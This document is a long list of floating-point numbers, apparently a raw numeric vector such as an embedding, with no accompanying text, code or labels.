0.015818094834685326, -0.01037439052015543, 0.0010064441012218595, 0.011172420345246792, -0.005874783731997013, -0.006940011400729418, 0.010538271628320217, -0.0008127259206958115, 0.019380729645490646, -0.012846858240664005, 0.058541204780340195, 0.017499659210443497, -0.009975375607609749, -0.025323202833533287, -0.002486718585714698, 0.023755643516778946, 0.002075234428048134, -0.006163356825709343, 0.012476344592869282, -0.00130659609567374, 0.006879446562379599, -0.017271650955080986, -0.00691151013597846, 0.013837270438671112, -0.02335662953555584, 0.03177869692444801, -0.005019751377403736, -0.016787132248282433, 0.00028590139118023217, 0.017200397327542305, 0.005055377725511789, 0.0028126996476203203, 0.004389165434986353, -0.017884423956274986, 0.0031315553933382034, 0.0032829672563821077, 0.02776004560291767, 0.01603185385465622, -0.002340650651603937, 0.016886886209249496, -0.04842332378029823, -0.003929585218429565, -0.012433593161404133, -0.0026060668751597404, -0.002691569970920682, -0.007545658852905035, -0.0042680357582867146, 0.015932099893689156, 0.02009325660765171, 0.04657075181603432, 0.02401215396821499, 0.00785917043685913, -0.01089453510940075, -0.011913448572158813, 0.0008982291328720748, 0.02489568665623665, -0.0032330905087292194, -0.025066694244742393, 0.01936647854745388, -0.01798417791724205, -0.02281510829925537, 0.011749567463994026, 0.01952323503792286, 0.0016735473182052374, -0.017784669995307922, 0.02412615902721882, 0.006494681816548109, 0.017613662406802177, -0.0006604233058169484, 0.0005989678320474923, 0.008892334997653961, 0.011778068728744984, 0.01856844872236252, 0.003012207103893161, 0.010673651471734047, -0.0037300779949873686, 0.010645151138305664, -0.005479331128299236, -0.0070219519548118114, 0.003085241187363863, 0.02880033478140831, 0.01487755961716175, -0.004684864077717066, 0.009953999891877174, 0.02166081592440605, -0.0052691358141601086, 0.008771205320954323, -0.0018899773713201284, -0.003436160506680608, 0.022416094318032265, 0.0025401581078767776, -0.017855921760201454, -0.01564708910882473, 0.006804631091654301, -0.008215433917939663, 0.005614711437374353, 0.004898621700704098, -0.006612248718738556, 0.012775605544447899, -0.013972651213407516, 0.02825881354510784, 0.003188557457178831, -0.005190758034586906, -0.013530883938074112, 0.019622988998889923, 0.021418556571006775, 0.0031600564252585173, -0.0011249016970396042, 0.025821972638368607, -0.006013726349920034, 0.013110493309795856, 0.006355739198625088, 0.0034130034036934376, 0.019238224253058434, -0.021418556571006775, -0.04075653478503227, -0.010139256715774536, 0.0034610989969223738, 0.011386178433895111, 0.018995964899659157, 0.02029276452958584, -0.021803321316838264, 0.02166081592440605, 0.012262586504220963, -0.004969874396920204, 0.0029605489689856768, -0.0031707442831248045, 0.002417247276753187, 0.022302089259028435, -0.005087441299110651, 0.0043179127387702465, 0.0011373709421604872, 0.011934824287891388, 0.009127468802034855, 0.014428667724132538, -0.01576109416782856, -0.0032936553470790386, 0.011222297325730324, -0.007894797250628471, -0.008450567722320557, 0.015276575461030006, -0.008585948497056961, 0.002419028664007783, -0.005814218893647194, -0.011877821758389473, -0.0011667626677080989, 0.011222297325730324, -0.0021429243497550488, -0.022259337827563286, -0.0056681507267057896, -0.008927960880100727, -0.01426478661596775, -0.013374128378927708, 0.0004010190023109317, 0.011450305581092834, -0.0032313091214746237, 0.011336301453411579, -0.01832618936896324, 0.023385129868984222, -0.012846858240664005, 0.009868496097624302, -0.0005677948356606066, 0.0032045894768089056, 0.023755643516778946, -0.0036766384728252888, -0.011108293198049068, -0.019238224253058434, -0.004902184475213289, -0.01081615686416626, -0.006551684346050024, -0.003217058489099145, -0.023299627006053925, 0.0034985067322850227, -0.021945826709270477, 0.0006212342996150255, -0.009868496097624302, 0.0016575155314058065, 0.009918373078107834, 0.005554146599024534, -0.004435479640960693, -0.003954523708671331, -0.0008309843833558261, -0.008621574379503727, 0.007246397901326418, 0.015362078323960304, -0.0051159425638616085, 0.007310525048524141, 0.01142892986536026, 0.008008801378309727, -0.004987687803804874, 0.006612248718738556, 0.020535023882985115, -0.011136794462800026, 0.011963325552642345, -0.0002660842437762767, 0.020848535001277924, 0.002741446951404214, -0.005436579696834087, -0.010858909226953983, -0.008714202791452408, -0.004193220287561417, -0.0017065017018467188, 0.001497196964919567, -0.024525173008441925, 0.008251060731709003, 0.021874573081731796, 0.038903962820768356, -0.006416304036974907, -0.014271912164986134, 0.010830407962203026, -0.024339916184544563, 0.016972389072179794, -0.004955624230206013, 0.013951275497674942, 0.007581285201013088, -0.0015052128583192825, 0.008429192006587982, 0.014977313578128815, 0.01045276876538992, -0.032918740063905716, -0.014407292008399963, 0.01963724009692669, -0.013260124251246452, -0.016060354188084602, -0.006907947361469269, 0.0052691358141601086, -0.0010581023525446653, -0.003518101293593645, -0.010196259245276451, 0.0005976318498142064, 0.005785717628896236, -0.0024475296959280968, -0.010445643216371536, 0.008023052476346493, 0.00510169193148613, 0.01918122172355652, -0.020535023882985115, 0.0005820453516207635, 0.002356682438403368, 0.017428405582904816, 0.011436055414378643, -0.00784492027014494, -0.03175019472837448, -0.0006270235753618181, -0.0038120185490697622, 0.006704877596348524, -0.010531146079301834, 0.007046890445053577, 0.011079791933298111, -0.0030264577362686396, 0.042466599494218826, -0.01718614622950554, -0.0006840257556177676, -0.01154293492436409, -0.018425943329930305, 0.009996751323342323, -0.01303924061357975, -0.009953999891877174, -0.034685805439949036, -0.01530507579445839, -0.01694388873875141, 0.00928422436118126, 0.004577985033392906, -0.019352229312062263, 0.010588148608803749, 0.020264262333512306, 0.02186032384634018, -0.0025330327916890383, -0.02262985147535801, -0.01068077702075243, -0.00760266138240695, -0.0008238591253757477, 0.00018180567712988704, 0.00409346679225564, -0.00971886608749628, 0.02331387810409069, 0.005853408016264439, -0.004125530365854502, 0.019922250881791115, 0.013616387732326984, -0.018653951585292816, 0.017200397327542305, 0.020150259137153625, 0.0005112380022183061, 0.016616124659776688, -0.004403415601700544, 0.004952061455696821, 0.00916309468448162, -0.015504583716392517, -0.010673651471734047, -0.013573636300861835, -0.00525488518178463, 0.008742704056203365, -0.0005392937455326319, -0.0049663120880723, 0.00371582736261189, 0.014920311979949474, 0.011179545894265175, -0.007467281073331833, 0.011343427002429962, 0.006031539756804705, 0.012205584906041622, -0.01359501201659441, 0.01714339479804039, 0.004880808759480715, 0.006156231742352247, 0.006441242527216673, -0.010951537638902664, -0.006491119507700205, -0.00884245801717043, -0.04397715628147125, -0.00442835409194231, 0.008699952624738216, 0.01068077702075243, -0.01290386077016592, 0.004909310024231672, 0.010780530981719494, -0.004952061455696821, -0.004410541150718927, 0.0031440246384590864, 0.007228584494441748, 0.004588672891259193, 0.009654738008975983, -0.02351338602602482, -0.0038476448971778154, 0.010060878470540047, -0.005735841114073992, 0.002365589141845703, 0.015575836412608624, 0.006858070846647024, -0.014457168988883495, -0.02158956229686737, -0.01355938520282507, 0.000211420061532408, 0.005643212236464024, 0.0027111645322293043, 0.005308324936777353, -0.00034112221328541636, 0.00645193038508296, 0.0034504111390560865, -0.022943364456295967, -0.003505632048472762, -0.01791292428970337, -0.00017256509454455227, -0.008999213576316833, 0.017114894464612007, 0.025779221206903458, 0.026220986619591713, 0.0008403363171964884, -0.000022670043108519167, -0.018283437937498093, 0.013552260585129261, -0.007567035034298897, -0.028287315741181374, 0.007374652661383152, -0.001394771272316575, 0.016430867835879326, 0.014735055156052113, 0.012405091896653175, -0.013231622986495495, 0.016003351658582687, -0.013081992045044899, -0.0291850995272398, -0.01276848092675209, 0.00458154734224081, -0.0044390419498085976, 0.020606275647878647, -0.0009307381696999073, 0.0385904535651207, 0.006462618242949247, -0.007787918206304312, -0.010744904167950153, 0.029128096997737885, 0.003933147992938757, -0.0041326554492115974, -0.005928223021328449, 0.018767956644296646, 0.0030389269813895226, 0.0061669196002185345, 0.025565462186932564, -0.02753203734755516, 0.001729658804833889, 0.008963587693870068, 0.03508482128381729, -0.01571834087371826, -0.003687326330691576, -0.00514800613746047, 0.009661863557994366, -0.0093198511749506, -0.002586472313851118, -0.0005584429018199444, 0.013081992045044899, -0.015062817372381687, 0.008357939310371876, 0.004727615509182215, 0.015561586245894432, -0.02285785973072052, -0.02009325660765171, -0.01242646761238575, 0.03440079465508461, -0.01859695091843605, -0.0235418863594532, -0.01014638226479292, -0.014100905507802963, -0.024453921243548393, -0.004414103459566832, -0.0035964790731668472, -0.017955675721168518, 0.0060921041294932365, 0.002025357447564602, 0.007987425662577152, -0.025266200304031372, -0.000479619629913941, 0.0217035673558712, -0.012925236485898495, 0.02136155404150486, -0.016787132248282433, -0.005237072240561247, -0.0260784812271595, 0.017927175387740135, 0.0059460364282131195, 0.0044889189302921295, 0.02059202454984188, 0.01198470126837492, 0.0029284851625561714, 0.002737884409725666, -0.005279823672026396, -0.010053753852844238, 0.0035804472863674164, -0.025365954264998436, -0.004364226944744587, -0.003747891169041395, 0.022572848945856094, 0.0105453971773386, 0.011322051286697388, 0.008450567722320557, -0.01290386077016592, -0.0038333942648023367, -0.002267616568133235, -0.016288362443447113, -0.015675589442253113, -0.010609524324536324, -0.012960863299667835, 0.007994551211595535, 0.0013386597856879234, -0.001845444436185062, -0.005803531035780907, -0.027047518640756607, 0.017627913504838943, 0.008201183751225471, -0.017114894464612007, -0.0021856760140508413, 0.001061665010638535, 0.0030531773809343576, 0.01451417151838541, -0.024753181263804436, 0.022344840690493584, 0.02872908115386963, 0.01852569729089737, 0.011115418747067451, -0.00021553935948759317, 0.005158693995326757, 0.003908209502696991, -0.02166081592440605, -0.024168910458683968, 0.004314349964261055, 0.003975899890065193, 0.004424791783094406, 0.011129668913781643, -0.011514433659613132, 0.0025829097721725702, 0.00005750314085162245, -0.02929910272359848, -0.0005205899360589683, -0.005614711437374353, 0.0224018432199955, 0.004314349964261055, -0.021732067689299583, -0.008194058202207088, 0.0016209984896704555, -0.009405354037880898, -0.0009948655497282743, -0.005315450020134449, -0.0168013833463192, 0.010089379735291004, -0.04007250815629959, 0.000319969083648175, 0.0013502383371815085, 0.0022498033940792084, 0.019608737900853157, -0.011920574121177197, 0.018041178584098816, -0.000704065547324717, -0.011257924139499664, -0.004054277669638395, 0.003519882448017597, 0.017357153818011284, 0.005967412143945694, -0.008528945967555046, -0.010965787805616856, -0.004649237729609013, 0.006027976982295513, 0.02020725980401039, 0.0014330695848912, -0.035683345049619675, 0.00582134397700429, 0.001973699312657118, 0.010217634961009026, 0.028273064643144608, 0.020677529275417328, -0.0075741601176559925, 0.007830670103430748, 0.007071828935295343, -0.011649813503026962, 0.013694765977561474, 0.013203121721744537, -0.00568596413359046, -0.004232409410178661, 0.004068528302013874, -0.00044132128823548555, 0.0006127730594016612, 0.004624299239367247, 0.0028322942089289427, -0.026890762150287628, 0.0035002881195396185, -0.0009485513437539339, 0.020535023882985115, -0.00582134397700429, 0.002240896923467517, 0.015561586245894432, 0.006444805301725864, -0.01173531636595726, -0.0007165347924456, -0.02006475441157818, 0.016017602756619453, 0.010524021461606026, -0.00914884451776743, 0.027902550995349884, 0.024168910458683968, 0.003329281695187092, 0.018425943329930305, 0.0030798972584307194, 0.01123654842376709, -0.027774294838309288, 0.009647613391280174, -0.0044960444793105125, 0.00545439263805747, -0.007239272352308035, 0.00907046627253294, -0.010324513539671898, -0.021447056904435158, 0.007257085759192705, -0.009170220233500004, -0.03172169253230095, 0.016345364972949028, 0.012469219043850899, -0.011934824287891388, -0.010794781148433685, -0.028016554191708565, -0.03574034571647644, 0.005924660712480545, 0.008920836262404919, -0.0007303400197997689, 0.0012255461188033223, -0.0018596949521452188, 0.018497196957468987, 0.02500969171524048, -0.004959186539053917, 0.006131293252110481, -0.010317387990653515, -0.00422884663566947, -0.019893748685717583, -0.013602136634290218, 0.001652171602472663, -0.029327604919672012, -0.0007031749119050801, -0.01154293492436409, 0.030809659510850906, 0.007417404092848301, 0.006576622370630503, -0.006868758704513311, -0.024254413321614265, 0.009861371479928493, 0.010117881000041962, 0.0087070781737566, -0.005197883117944002, 0.006801068317145109, 0.005400953348726034, -0.008557447232306004, 0.0117709431797266, 0.005333263427019119, -0.02389814890921116, -0.0036321054212749004, -0.02614973485469818, -0.002688007429242134, -0.014029652811586857, 0.007100329734385014, -0.045430708676576614, -0.017342902719974518, -0.00009190482523990795, -0.007474406156688929, -0.011008539237082005, -0.006138418801128864, 0.021575313061475754, -0.007538533769547939, 0.028657829388976097, 0.0019256037194281816, -0.010288887657225132, 0.0023744956124573946, 0.01814093254506588, 0.007438779808580875, 0.011592810973525047, 0.021375805139541626, 0.0020039817318320274, -0.0032081520184874535, 0.0009115890134125948, -0.035569339990615845, 0.010353014804422855, 0.007481531705707312, 0.0117709431797266, 0.008927960880100727, -0.01509131770581007, -0.0008398909703828394, 0.015661340206861496, -0.007264210842549801, 0.011272174306213856, 0.006359301973134279, -0.014457168988883495, -0.02542295679450035, 0.0004952061572112143, -0.007837794721126556, -0.00773804122582078, -0.0021179860923439264, -0.02327112667262554, -0.009369728155434132, -0.007310525048524141, 0.006031539756804705, -0.0013172839535400271, -0.006441242527216673, -0.013887147419154644, 0.014015402644872665, -0.015233823098242283, 0.013352752663195133, 0.005347513593733311, 0.0038725833874195814, -0.011920574121177197, -0.01530507579445839, -0.002150049665942788, 0.013167495839297771, -0.014678052626550198, 0.002112641930580139, 0.003893959103152156, 0.0027628226671367884, 0.022230837494134903, -0.0018988839583471417, 0.015504583716392517, 0.012654476799070835, -0.01298223901540041, 0.00032108239247463644, -0.007135956082493067, 0.006957824341952801, 0.010060878470540047, 0.01902446709573269, -0.0008795253233984113, 0.025522710755467415, 0.0016851259861141443, 0.03576884791254997, -0.01219845935702324, 0.007730916142463684, -0.003560852725058794, -0.00032308639492839575, -0.024525173008441925, 0.02308586984872818, -0.012554722838103771, 0.023484883829951286, -0.002331743948161602, -0.0018721641972661018, 0.006790380459278822, -0.02151831053197384, -0.0050660655833780766, -0.002826950279995799, -0.021261800080537796, 0.004396290518343449, -0.00008845352567732334, 0.005728715565055609, 0.012433593161404133, -0.007160894572734833, -0.011037040501832962, 0.01003237720578909, 0.0014793837908655405, -0.018197935074567795, -0.00998962577432394, -0.0016610781894996762, 0.009797243401408195, 0.003306124359369278, -0.008436317555606365, 0.004214596003293991, 0.0248529352247715, -0.003573321970179677, 0.017969926819205284, 0.002214177045971155, 0.008265310898423195, -0.004834494553506374, 0.010695027187466621, 0.010923036374151707, -0.0063450513407588005, -0.010495520196855068, 0.002598941558972001, 0.00009407580364495516, -0.025565462186932564, 0.00514800613746047, -0.0055648344568908215, 0.013815894722938538, -0.0010981819359585643, -0.007046890445053577, -0.006847382988780737, -0.0028465446084737778, 0.0005539896083064377, -0.004360664170235395, 0.015903599560260773, 0.00004478342452785, -0.009768743067979813, 0.0038120185490697622, 0.006291612051427364, 0.0002389191504335031, -0.006993450690060854, -0.004699114244431257, 0.018554197624325752, 0.008172682486474514, 0.002493843901902437, -0.017271650955080986, 0.008785455487668514, 0.007595535833388567, -0.00468842638656497, -0.0008345470414496958, 0.009291349910199642, -0.0031956827733665705, 0.011963325552642345, -0.0033862837590277195, -0.0024902813602238894, 0.02281510829925537, -0.012006076984107494, -0.005853408016264439, 0.0029623303562402725, -0.023328127339482307, -0.019765494391322136, -0.00014116938109509647, -0.016245611011981964, 0.023784145712852478, 0.002174988156184554, 0.013367002829909325, 0.011101167649030685, -0.002461780095472932, -0.0014704772038385272, 0.0031066169030964375, -0.010089379735291004, -0.00941247958689928, -0.007403153460472822, -0.005197883117944002, -0.006925760768353939, -0.004349976312369108, 0.007559909485280514, -0.008771205320954323, 0.003021113807335496, 0.013915648683905602, -0.01844019442796707, -0.002023576060310006, 0.007830670103430748, 0.012034578248858452, -0.02166081592440605, 0.0032829672563821077, -0.0008247498190030456, 0.003779954742640257, 0.021418556571006775, 0.019266724586486816, 0.022416094318032265, -0.007257085759192705, 0.008607324212789536, 0.014891810715198517, -0.00910609308630228, -0.012711478397250175, 0.00046670506708323956, 0.009248598478734493, -0.010666526854038239, -0.000018147167793358676, -0.008443443104624748, 0.027218524366617203, 0.01442154310643673, 0.005212133750319481, -0.021347302943468094, 0.010075129568576813, 0.024724680930376053, -0.008122805505990982, -0.016886886209249496, 0.001265625818632543, 0.014307538978755474, -0.015903599560260773, 0.002356682438403368, 0.0007570597226731479, 0.003165400354191661, -0.000705401529558003, 0.009326975792646408, 0.018226435407996178, 0.013046366162598133, 0.017399905249476433, 0.01276848092675209, -0.0020449520088732243, 0.0022337716072797775, 0.01175669301301241, -0.008956462144851685, -0.011300675570964813, -0.005878346506506205, -0.009569235146045685, 0.012483470141887665, 0.026206737384200096, 0.00718939583748579, -0.0028803895693272352, -0.014849059283733368, -0.00011723292845999822, -0.018454445526003838, 0.015376328490674496, -0.02204558067023754, -0.00014540000120177865, -0.007438779808580875, -0.027859799563884735, -0.01768491603434086, 0.00028590139118023217, -0.0021090793889015913, 0.01836894080042839, -0.008970712311565876, 0.005860533099621534, 0.03830544278025627, 0.006441242527216673, 0.004460418131202459, -0.001368942204862833, -0.005304762162268162, 0.006042227614670992, 0.025066694244742393, 0.0005241525359451771, 0.022943364456295967, -0.0011801226064562798, -0.02907109446823597, 0.008372190408408642, -0.010737779550254345, 0.009127468802034855, -0.017243148759007454, -0.02204558067023754, 0.008849583566188812, -0.007809293922036886, 0.0025045317597687244, -0.003690888872370124, 0.0041148425079882145, 0.007107455283403397, -0.0028091371059417725, -0.004421229008585215, -0.004809556063264608, 0.0064198668114840984, 0.02235909178853035, -0.003997275605797768, -0.011257924139499664, 0.012647351250052452, -0.00941247958689928, -0.004396290518343449, 0.014257661998271942, 0.012853983789682388, 0.000551762932445854, 0.008215433917939663, -0.016772881150245667, -0.014279037714004517, 0.0005041127442382276, 0.027603289112448692, 0.021888824179768562, -0.00614554388448596, -0.004777492489665747, 0.007695289794355631, -0.018269186839461327, -0.007723790593445301, -0.003056740155443549, -0.026363492012023926, 0.0010990726295858622, -0.006380677688866854, 0.006979200057685375, -0.003047833452001214, 0.0217890702188015, 0.01386577170342207, -0.0042609102092683315, 0.02082003466784954, 0.006006601266562939, -0.0210907943546772, 0.03582584857940674, -0.005625399295240641, 0.0006724472041241825, -0.004556608851999044, -0.011998951435089111, 0.013459631241858006, -0.0036944516468793154, 0.030809659510850906, 0.013395504094660282, -0.006943573709577322, -0.004976999945938587, -0.014635301195085049, 0.023769894614815712, -0.006786818150430918, -0.01768491603434086, 0.01464955136179924, 0.01748540811240673, 0.026591500267386436, 0.0010572116589173675, 0.026491748169064522, -0.031151672825217247, -0.00998962577432394, 0.01390139851719141, -0.014350290410220623, 0.005785717628896236, -0.004442604724317789, -0.01809818111360073, -0.01891046203672886, 0.002826950279995799, -0.004560171626508236, 0.0008038193336687982, 0.012112955562770367, -0.033916275948286057, 0.010011001490056515, -0.01844019442796707, 0.019565986469388008, -0.022059829905629158, -0.00407565338537097, 0.013445381075143814, -0.002114423317834735, -0.013138994574546814, 0.005151568911969662, -0.025180697441101074, 0.004193220287561417, 0.030325140804052353, 0.0014027871657162905, -0.00422884663566947, -0.02328537590801716, 0.0028501073829829693, 0.003008644562214613, 0.015362078323960304, 0.007453030440956354, 0.014200659468770027, -0.0033488760236650705, -0.007417404092848301, 0.012469219043850899, 0.00749578233808279, 0.002397652715444565, -0.01757091097533703, -0.000651962065603584, 0.015775343403220177, 0.00703620258718729, -0.007545658852905035, 0.007887671701610088, 0.00036405667196959257, 0.01571834087371826, 0.01909571886062622, -0.016901135444641113, 0.0038227064069360495, 0.00014629066572524607, -0.001895321300253272, 0.01451417151838541, -0.006391365546733141, 0.04440467059612274, 0.007050452753901482, 0.04306511953473091, -0.00989699736237526, -0.03232021629810333, -0.008115680888295174, 0.004613611381500959, 0.009604861959815025, 0.00312621146440506, -0.006483993958681822, 0.013053491711616516, -0.003304343204945326, -0.014549797400832176, 0.01587509736418724, 0.0210907943546772, 0.009882747195661068, -0.002255147323012352, 0.011193796060979366, 0.012048828415572643, 0.014891810715198517, 0.0035305703058838844, 0.0037977679166942835, 0.042580604553222656, 0.004788180347532034, 0.0031226486898958683, -0.010046628303825855, -0.010274636559188366, -0.004984125029295683, 0.017086394131183624, -0.0002525016898289323, 0.015219572931528091, -0.0052691358141601086, -0.014499920420348644, -0.0007953580934554338, -0.029356105253100395, -0.006815318949520588, 0.008749829605221748, 0.02324262447655201, -0.004346413537859917, -0.0075242831371724606, 0.00499481288716197, -0.020392518490552902, 0.0042680357582867146, -0.0011792319128289819, -0.023527635261416435, 0.0021589563693851233, -0.0005824906984344125, 0.002201707800850272, -0.0058854715898633, -0.025907475501298904, 0.009056216105818748, 0.0004622517735697329, -0.010581023059785366, 0.012967987917363644, 0.000307277194224298, -0.010695027187466621, 0.008543197065591812, 0.008236809633672237, -0.0096262376755476, 0.01251909602433443, 0.009654738008975983, -0.022829359397292137, -0.00807292852550745, 0.013224497437477112, 0.012590348720550537, -0.015974851325154305, 0.007852045819163322, 0.0020164509769529104, -0.00019750352657865733, -0.0014580079587176442, 0.006263110786676407, -0.02642049454152584, 0.005461518187075853, 0.0009298474760726094, -0.005913972854614258, 0.007488656789064407, 0.010809032246470451, -0.005326137878000736, -0.0028376381378620863, -0.01625986211001873, -0.007673914078623056, -0.0224018432199955, 0.0060386648401618, 0.02542295679450035, -0.014720804058015347, 0.002588253701105714, 0.031123172491788864, -0.011037040501832962, 0.0056930892169475555, -0.019665740430355072, -0.00199329387396574, 0.016017602756619453, -0.0015087755164131522, 0.0064198668114840984, 0.021461308002471924, -0.0006809084443375468, -0.010965787805616856, -0.011243673041462898, -0.012775605544447899, 0.01841169223189354, 0.010288887657225132, 0.009868496097624302, 0.008635825477540493, -0.010110755451023579, -0.0024902813602238894, -0.011343427002429962, -0.0105453971773386, -0.011058416217565536, 0.013858647085726261, 0.0168013833463192, 0.027090270072221756, 0.00998962577432394, 0.029812121763825417, -0.01564708910882473, -0.007916172966361046, 0.0022569287102669477, -0.00945523101836443, -0.0003814245283138007, -0.011820820160210133, 0.0016281238058581948, -0.0009200502536259592, -0.013238748535513878, 0.01583234593272209, 0.009398228488862514, 0.0044960444793105125, -0.02020725980401039, -0.00788054708391428, -0.008101429790258408, -0.009747367352247238, 0.018938962370157242, 0.005240634549409151, -0.002867920557036996, 0.002125111175701022, 0.0025650965981185436, 0.001487399684265256, -0.005468643270432949, -0.032462723553180695, 0.02512369491159916, 0.00278954254463315, -0.013146120123565197, -0.01290386077016592, -0.005710902623832226, 0.015575836412608624, 0.015903599560260773, -0.003601823002099991, -0.015062817372381687, -0.010830407962203026, 0.004880808759480715, 0.000947660650126636, -0.015732591971755028, -0.00785917043685913, -0.011008539237082005, -0.008849583566188812, 0.01321024727076292, 0.014934562146663666, 0.005543458741158247, -0.0005971865612082183, 0.007951799780130386, 0.023071618750691414, -0.020577775314450264, -0.007000576239079237, 0.0017483626725152135, -0.012070204131305218, 0.004645674955099821, 0.004250222351402044, -0.02079153247177601, -0.005985225085169077, 0.013046366162598133, -0.015632838010787964, -0.007894797250628471, 0.0023638077545911074, 0.010958662256598473, -0.00525488518178463, -0.014621050097048283, 0.007994551211595535, 0.005536333192139864, 0.01607460528612137, 0.0033239375334233046, 0.003165400354191661, -0.00041794151184149086, 0.009305600076913834, -0.009847120381891727, 0.01940922997891903, 0.006761879660189152, 0.008771205320954323, 0.00396877434104681, -0.008906585164368153, 0.002296117600053549, 0.00242971652187407, -0.015903599560260773, -0.012939486652612686, 0.02986912429332733, 0.002174988156184554, 0.008806831203401089, 0.006850945297628641, 0.005889034364372492, 0.000027874828447238542, -0.013794519007205963, 0.0009503326728008687, 0.018767956644296646, 0.004392727743834257, -0.000922722218092531, -0.009832870215177536, -0.004178969655185938, -0.0173714030534029, 0.012818357907235622, -0.0039010844193398952, -0.00660512363538146, 0.0067690047435462475, 0.007745166774839163, -0.006879446562379599, 0.015077067539095879, -0.0033364067785441875, -0.00032108239247463644, 0.027589038014411926, 0.01943773217499256, -0.019380729645490646, 0.019280975684523582, 0.01321024727076292, 0.02101954072713852, -0.0029160159174352884, -0.007552784401923418, 0.021646564826369286, -0.010744904167950153, 0.019152721390128136, 0.023043116554617882, -0.01112254336476326, -0.018653951585292816, -0.016587624326348305, -0.006993450690060854, 0.011143919080495834, 0.011799444444477558, 0.018197935074567795, 0.0017323308857157826, 0.0037942053750157356, 0.0322062112390995, 0.0003789752081502229, -0.004015088547021151, -0.0017011577729135752, 0.012960863299667835, 0.006312987767159939, 0.012725729495286942, -0.010730654001235962, -0.022145332768559456, 0.02907109446823597, 0.003801330691203475, 0.012668726965785027, 0.02814481034874916, 0.004524545278400183, -0.024439670145511627, 0.0012014983221888542, -0.004695551935583353, -0.011799444444477558, 0.0027218523900955915, -0.012070204131305218, -0.006843820214271545, -0.0073960283771157265, -0.0009040184086188674, -0.002470686798915267, 0.004649237729609013, 0.0033239375334233046, 0.01242646761238575, 0.01825493760406971, 0.016231361776590347, 0.013773143291473389, -0.007588410750031471, 0.023983653634786606, 0.016131607815623283, -0.01657337322831154, 0.00907046627253294, 0.0210907943546772, 0.03132268041372299, 0.016060354188084602, 0.008749829605221748, 0.02580772154033184, 0.012269712053239346, 0.024995440617203712, -0.0010652275523170829, 0.014257661998271942, -0.0034343793522566557, -0.013780268840491772, 0.02825881354510784, 0.012376590631902218, -0.010360140353441238, -0.014150782488286495, -0.02807355672121048, -0.014920311979949474, 0.0029926125425845385, -0.012383716180920601, -0.009184470400214195, 0.036139361560344696, 0.003056740155443549, -0.013089117594063282, -0.018397442996501923, 0.013694765977561474, -0.008165556937456131, -0.025665216147899628, -0.003008644562214613, 0.0024119033478200436, -0.0016806726343929768, 0.012048828415572643, -0.019850997254252434, 0.025209199637174606, 0.013317126780748367, 0.006708439905196428, 0.003651699982583523, 0.02868632972240448, -0.009326975792646408, 0.015347828157246113, 0.00006858070992166176, -0.007107455283403397, -0.0145925497636199, -0.011436055414378643, 0.006530308164656162, 0.00031128517002798617, 0.01194907445460558, -0.010174882598221302, -0.031351178884506226, -0.0037193899042904377, -0.014051028527319431, -0.007517158053815365, -0.009476606734097004, -0.009341226890683174, -0.028472572565078735, -0.010388640686869621, -0.0065908730030059814, -0.0025579712819308043, 0.0035751033574342728, 0.0005139099666848779, -0.02492418885231018, -0.0347428061068058, -0.013060616329312325, 0.003790642600506544, 0.026178235188126564, 0.018083930015563965, 0.013552260585129261, -0.008892334997653961, -0.01771341636776924, -0.03371676802635193, -0.007595535833388567, 0.014236286282539368, 0.024069156497716904, -0.012661601416766644, 0.015333577059209347, -0.01598910242319107, -0.020991040393710136, -0.018725205212831497, 0.0048629953525960445, -0.0014384135138243437, 0.007103892508894205, 0.02324262447655201, -0.019152721390128136, -0.007207208778709173, -0.010623774491250515, 0.01102279033511877, -0.010944412089884281, -0.000589170609600842, -0.007887671701610088, -0.000345575506798923, 0.026206737384200096, 0.015347828157246113, 0.007135956082493067, -0.008357939310371876, 0.007873421534895897, -0.006519620306789875, 0.00007887894753366709, 0.002814481034874916, 0.004015088547021151, -0.00807292852550745, 0.022772356867790222, 0.01225546095520258, -0.017627913504838943, 0.01641661860048771, 0.004745428450405598, 0.0009298474760726094, 0.011343427002429962, -0.010445643216371536, 0.005604023579508066, -0.0053118872456252575, 0.007638287730515003, 0.008507570251822472, 0.007780793122947216, -0.010495520196855068, -0.008365064859390259, 0.01591784879565239, 0.0004943154635839164, 0.015276575461030006, 0.006968512199819088, 0.009127468802034855, -0.010060878470540047, 0.010623774491250515, 0.020107507705688477, 0.008977837860584259, 0.005728715565055609, -0.024838684126734734, 0.012234085239470005, -0.006879446562379599, 0.007235710043460131, 0.012704352848231792, -0.0055398959666490555, 0.015447581186890602, -0.007232147268950939, 0.010324513539671898, 0.019067218527197838, 0.008635825477540493, -0.017969926819205284, 0.0026452557649463415, -0.004492481704801321, 0.004731178283691406, 0.023570386692881584, 0.007424529641866684, 0.002814481034874916, 0.008315187878906727, 0.010559647344052792, 0.012234085239470005, 0.0034539736807346344, 0.02550845965743065, 0.014977313578128815, 0.013167495839297771, 0.025337453931570053, -0.00889945961534977, 0.013623513281345367, -0.019879497587680817, -0.008343689143657684, 0.047112274914979935, 0.003304343204945326, 0.03186419978737831, 0.009647613391280174, 0.001164090703241527, -0.017656413838267326, -0.016901135444641113, 0.007178707513958216, 0.004891496617347002, 0.013138994574546814, -0.009091841988265514, 0.011343427002429962, -0.016958137974143028, -0.013324251398444176, -0.015860846266150475, 0.0030282388906925917, 0.008749829605221748, 0.030581651255488396, -0.004389165434986353, -0.032662227749824524, -0.004542358685284853, -0.015704091638326645, 0.007043327670544386, -0.012782731093466282, -0.013580760918557644, -0.007609786465764046, -0.0028875148855149746, 0.0008145072497427464, -0.011799444444477558, 0.0017376748146489263, 0.0348283126950264, -0.008065803907811642, 0.000857258855830878, -0.0049128723330795765, -0.006715565454214811, 0.009497982449829578, 0.01591784879565239, 0.018995964899659157, 0.0011124324519187212, 0.007185833062976599, 0.006772567518055439, 0.0035519462544471025, 0.011970450170338154, -0.021874573081731796, 0.00597453722730279, 0.0022569287102669477, 0.00019538821652531624, 0.0015007596230134368, 0.0027574787382036448, -0.02585047297179699, 0.01359501201659441, 0.008771205320954323, -0.01225546095520258, -0.004638549406081438, -0.007923298515379429, 0.0120773296803236, -0.0027628226671367884, -0.0065979985520243645, 0.0015301513485610485, -0.007139518857002258, -0.005874783731997013, -0.010117881000041962, 0.010196259245276451, -0.0015301513485610485, -0.01791292428970337, 0.017699167132377625, -0.0007949127466417849, 0.007249960210174322, 0.012804106809198856, -0.0014419761719182134, -0.0012852202635258436, -0.018197935074567795, 0.005953161511570215, 0.010367264971137047, 0.01123654842376709, -0.018881961703300476, -0.0006270235753618181, 0.004955624230206013, 0.0077950432896614075, -0.01037439052015543, 0.017385654151439667, 0.0006666579283773899, 0.006437679752707481, 0.0023228374775499105, -0.00016287917969748378, -0.020036254078149796, -0.009697490371763706, 